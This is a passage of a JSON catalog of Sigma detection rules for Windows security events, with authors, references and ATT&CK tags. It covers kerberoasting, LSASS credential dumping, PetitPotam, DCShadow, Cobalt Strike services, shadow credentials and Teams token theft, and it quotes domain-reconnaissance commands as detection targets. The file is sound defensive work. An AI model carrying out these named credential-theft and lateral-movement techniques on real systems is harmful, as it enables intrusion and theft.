"f7644214-0eb0-4ace-9455-331ec4c09253", "value": "Kerberos Manipulation" }, { "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", "meta": { "author": "Mauricio Velazco, Michael Haag", "creation_date": "2021-09-02", "falsepositive": [ "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." ], "filename": "win_security_petitpotam_susp_tgt_request.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", "https://github.com/topotam/PetitPotam", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" ], "tags": [ "attack.credential-access", "attack.t1187" ] }, "related": [ { "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", "value": "PetitPotam Suspicious Kerberos TGT Request" }, { "description": "Detects known sensitive file extensions accessed on a network share", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-04-03", "falsepositive": [ "Help Desk operator doing backup or re-imaging end user machine or backup software", "Users working with these data types or exchanging message files" ], "filename": "win_security_susp_raccess_sensitive_fext.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml" ], "tags": [ "attack.collection", "attack.t1039" ] }, "related": [ { "dest-uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "91c945bc-2ad1-4799-a591-4d00198a1215", "value": "Suspicious Access to Sensitive File Extensions" }, { "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-06-20", "falsepositive": [ "Unknown" ], "filename": "win_security_lsass_access_non_system_account.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/170105-LSASSMemoryReadAccess/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", "value": "LSASS Access From Non System Account" }, { "description": "This rule will collect the data needed to start looking into possible kerberoasting activity.\nFurther analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds.\nYou can then set a threshold for the number of requests and time between the requests to turn this into an alert.\n", "meta": { "author": "@kostastsale", "creation_date": "2022-01-21", "falsepositive": [ "Legacy applications." ], "filename": "win_security_kerberoasting_activity.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=3513", "https://www.trustedsec.com/blog/art_of_kerberoast/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_kerberoasting_activity.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d04ae2b8-ad54-4de0-bd87-4bc1da66aa59", "value": "Kerberoasting Activity - Initial Query" }, { "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-06-05", "falsepositive": [ "Unknown" ], "filename": "win_security_dot_net_etw_tamper.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "http://managed670.rssing.com/chan-5590147/all_p1.html", "https://bunnyinside.com/?term=f71e8cb9c76a", "https://twitter.com/_xpn_/status/1268712093928378368", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112", "attack.t1562" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", "value": "ETW Logging Disabled In .NET Processes - Registry" }, { "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", "meta": { "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "creation_date": "2017-03-07", "falsepositive": [ "Administrator activity" ], "filename": "win_security_susp_net_recon_activity.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml" ], "tags": [ "attack.discovery", "attack.t1087.002", "attack.t1069.002", "attack.s0039" ] }, "related": [ { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "968eef52-9cff-4454-8992-1e74b9cbad6c", "value": "Reconnaissance Activity" }, { "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-04-03", "falsepositive": [ "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduled tasks." ], "filename": "win_security_gpo_scheduledtasks.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/menasec1/status/1106899890377052160", "https://www.secureworks.com/blog/ransomware-as-a-distraction", "https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-0-16-1-scheduled-task-execution-at-scale-via-gpo.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" ], "tags": [ "attack.persistence", "attack.lateral-movement", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a8f29a7b-b137-4446-80a0-b804272f3da2", "value": "Persistence and Execution at Scale via GPO Scheduled Task" }, { "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", "meta": { "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-23", "falsepositive": [ "The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out" ], "filename": "win_security_service_install_remote_access_software.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_install_remote_access_software.yml" ], "tags": [ "attack.persistence", "attack.t1543.003", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c8b00925-926c-47e3-beea-298fd563728e", "value": "Remote Access Tool Services Have Been Installed - Security" }, { "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", "meta": { "author": "@neu5ron", "creation_date": "2017-04-13", "falsepositive": [ "Unknown" ], "filename": "win_security_alert_ad_user_backdoors.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=3466", "https://msdn.microsoft.com/en-us/library/cc220234.aspx", "https://blog.harmj0y.net/redteaming/another-word-on-delegation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" ], "tags": [ "attack.t1098", "attack.persistence" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "300bac00-e041-4ee2-9c36-e262656a6ecc", "value": "Active Directory User Backdoors" }, { "description": "Detects powershell script installed as a Service", "meta": { "author": "oscd.community, Natalia Shornikova", "creation_date": "2020-10-06", "falsepositive": [ "Unknown" ], "filename": "win_security_powershell_script_installed_as_service.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml" ], "tags": [ "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "value": "PowerShell Scripts Installed as Services - Security" }, { "description": "Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.\n", "meta": { "author": "Ilyas Ochkov, oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Web Browsers and third party application might generate similar activity. An initial baseline is required." ], "filename": "win_security_susp_outbound_kerberos_connection.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/Rubeus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml" ], "tags": [ "attack.lateral-movement", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", "value": "Uncommon Outbound Kerberos Connection - Security" }, { "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "value": "Invoke-Obfuscation Via Use MSHTA - Security" }, { "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", "meta": { "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "creation_date": "2021-05-26", "falsepositive": [ "Unknown" ], "filename": "win_security_cobaltstrike_service_installs.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://www.sans.org/webcasts/119395", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.lateral-movement", "attack.t1021.002", "attack.t1543.003", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "value": "CobaltStrike Service Installations - Security" }, { "description": "Detects DCShadow via create new SPN", "meta": { "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", "creation_date": "2019-10-25", "falsepositive": [ "Valid on domain controllers; exclude known DCs" ], "filename": "win_security_possible_dc_shadow.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://web.archive.org/web/20180203014709/https://blog.alsid.eu/dcshadow-explained-4510f52fc19d?gi=c426ac876c48", "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" ], "tags": [ "attack.credential-access", "attack.t1207" ] }, "related": [ { "dest-uuid": "564998d8-ab3e-4123-93fb-eccaa6b9714a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", "value": "Possible DC Shadow Attack" }, { "description": "Detects the mount of an ISO image on an endpoint", "meta": { "author": "Syed Hasan (@syedhasan009)", "creation_date": "2021-05-29", "falsepositive": [ "Software installation ISO files" ], "filename": "win_security_iso_mount.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", "https://twitter.com/MsftSecIntel/status/1257324139515269121", "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", "value": "ISO Image Mounted" }, { "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-05-03", "falsepositive": [ "Unknown" ], "filename": "win_security_hidden_user_creation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1387743867663958021", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hidden_user_creation.yml" ], "tags": [ "attack.persistence", "attack.t1136.001" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", "value": "Hidden Local User Creation" }, { "description": "Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.\n", "meta": { "author": "Patrick Bareiss", "creation_date": "2019-04-18", "falsepositive": [ "Domain Controller Logs", "Local accounts managed by privileged account management tools" ], "filename": "win_security_user_creation.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_creation.yml" ], "tags": [ "attack.persistence", "attack.t1136.001" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "66b6be3d-55d0-4f47-9855-d69df21740ea", "value": "Local User Creation" }, { "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "value": "T1047 Wmiprvse Wbemcomn DLL Hijack" }, { "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-08-10", "falsepositive": [ "Unknown" ], "filename": "win_security_protected_storage_service_access.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_protected_storage_service_access.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "45545954-4016-43c6-855e-eae8f1c369dc", "value": "Protected Storage Service Access" }, { "description": "Detects renaming of file while deletion with SDelete tool.", "meta": { "author": "Thomas Patzke", "creation_date": "2017-06-14", "falsepositive": [ "Legitimate usage of SDelete" ], "filename": "win_security_susp_sdelete.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-gb/sysinternals/downloads/sdelete", "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" ], "tags": [ "attack.impact", "attack.defense-evasion", "attack.t1070.004", "attack.t1027.005", "attack.t1485", "attack.t1553.002", "attack.s0195" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b0533c6e-8fea-4788-874f-b799cacc4b92", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "32901740-b42c-4fdd-bc02-345b5dc57082", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39a80702-d7ca-4a83-b776-525b1f86a36d", "value": "Secure Deletion with SDelete" }, { "description": "Detects possible addition of shadow credentials to an active directory object.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "creation_date": "2022-10-17", "falsepositive": [ "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" ], "filename": "win_security_susp_possible_shadow_credentials_added.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1581300963650187264?", "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" ], "tags": [ "attack.credential-access", "attack.t1556" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f598ea0c-c25a-4f72-a219-50c44411c791", "value": "Possible Shadow Credentials Added" }, { "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-08-26", "falsepositive": [ "Unknown" ], "filename": "win_security_aadhealth_mon_agent_regkey_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://o365blog.com/post/hybridhealthagent/", "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml" ], "tags": [ "attack.discovery", "attack.t1012" ] }, "related": [ { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff151c33-45fa-475d-af4f-c2f93571f4fe", "value": "Azure AD Health Monitoring Agent Registry Keys Access" }, { "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", "meta": { "author": "@neu5ron", "creation_date": "2017-07-30", "falsepositive": [ "Unknown" ], "filename": "win_security_alert_enable_weak_encryption.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=2053", "https://blog.harmj0y.net/redteaming/another-word-on-delegation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f6de9536-0441-4b3f-a646-f4e00f300ffd", "value": "Weak Encryption Enabled and Kerberoast" }, { "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", "meta": { "author": "@SerkinValery", "creation_date": "2022-09-16", "falsepositive": [ "Unknown" ], "filename": "win_security_teams_suspicious_objectaccess.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml" ], "tags": [ "attack.credential-access", "attack.t1528" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "25cde13e-8e20-4c29-b949-4e795b76f16f", "value": "Suspicious Teams Application Related ObjectAcess Event" }, { "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", "meta": { "author": "@neu5ron", "creation_date": "2019-02-05", "falsepositive": [ "HyperV or other virtualization technologies with binary not listed in filter portion of detection" ], "filename": "win_security_susp_time_modification.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4616", "Live environment caused by malware", "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.006" ] }, "related": [ { "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "faa031b5-21ed-4e02-8881-2591f98d82ed", "value": "Unauthorized System Time Modification" }, { "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", "meta": { "author": "Tim Shelton (HAWK.IO)", "creation_date": "2021-12-06", "falsepositive": [ "Read only access list authority" ], "filename": "win_security_net_share_obj_susp_desktop_ini.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml" ], "tags": [ "attack.persistence", "attack.t1547.009" ] }, "related": [ { "dest-uuid": "4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", "value": "Windows Network Access Suspicious desktop.ini Action" }, { "description": "Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators\n", "meta": { "author": "Stamatis Chatzimangou (st0pp3r)", "creation_date": "2024-01-05", "falsepositive": [ "Unknown" ], "filename": "win_security_hktl_nofilter.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/deepinstinct/NoFilter/blob/121d215ab130c5e8e3ad45a7e7fcd56f4de97b4d/NoFilter/Consts.cpp", "https://github.com/deepinstinct/NoFilter", "https://x.com/_st0pp3r_/status/1742203752361128162?s=20", "https://www.deepinstinct.com/blog/nofilter-abusing-windows-filtering-platform-for-privilege-escalation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hktl_nofilter.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1134", "attack.t1134.001" ] }, "related": [ { "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7b14c76a-c602-4ae6-9717-eff868153fc0", "value": "HackTool - NoFilter Execution" }, { "description": "Rule to detect the Hybrid Connection Manager service installation.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2021-04-12", "falsepositive": [ "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "filename": "win_security_hybridconnectionmgr_svc_installation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", 